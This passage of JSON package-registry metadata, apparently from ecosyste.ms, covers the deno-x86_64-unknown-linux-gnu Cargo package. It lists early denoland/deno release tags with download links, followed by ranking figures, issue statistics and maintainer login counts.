deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:50:24.895Z","dependent_packages_count":1,"downloads":61626,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":12.333507097905004,"dependent_repos_count":13.317204097833892,"dependent_packages_count":18.15597474766567,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":null,"average":8.773425158884066},"purl":"pkg:cargo/deno-x86_64-unknown-linux-gnu","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno-x86_64-unknown-linux-gnu","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno-x86_64-unknown-linux-gnu","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno-x86_64-unknown-linux-gnu/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ec